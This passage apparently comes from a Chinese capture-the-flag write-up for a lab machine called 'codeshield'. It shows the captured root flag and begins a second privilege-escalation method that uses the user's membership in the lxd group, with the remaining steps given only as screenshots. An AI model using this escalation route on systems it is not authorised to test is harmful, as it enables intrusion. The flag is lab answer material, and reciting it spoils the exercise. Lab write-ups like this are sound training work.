\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _ROOT FLAG!________________________________________________________________________________________ |\n | | | |\n | | Educate_your_employees_on_password_safety | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________| <\/code><\/pre>\n\u63d0\u6743root(\u65b9\u6cd52:lxd)<\/h3>\n
\u4e5f\u662f\u770b\u522b\u7684\u5e08\u5085\u7684\u601d\u8def\u7684\uff0c\u771f\u6ca1\u6ce8\u610f\u5230\uff0c\u539f\u56e0\u662f\u4e00\u4e2a\u7279\u6b8a\u7684\u7ec4\u6743\u9650\uff1a<\/p>\n
earlyp@codeshield:~$ id\nuid=1000(earlyp) gid=1000(earlyp) groups=1000(earlyp),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd)<\/code><\/pre>\n
![\"image-20250530100300186\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612543.png\")
<\/div><\/p>\n![\"image-20250530100359795\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612544.png\")
<\/div><\/p>\n![\"image-20250530101708792\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612545.png\")
<\/div><\/p>\n![\"image-20250530104335540\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612546.png\")
<\/div><\/p>\n![\"image-20250530104703775\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612547.png\")
<\/div><\/p>\n![\"image-20250530135120877\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612548.png\")
<\/div><\/p>\n![\"image-20250530155148306\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202505301612549.png\")
<\/div><\/p>\n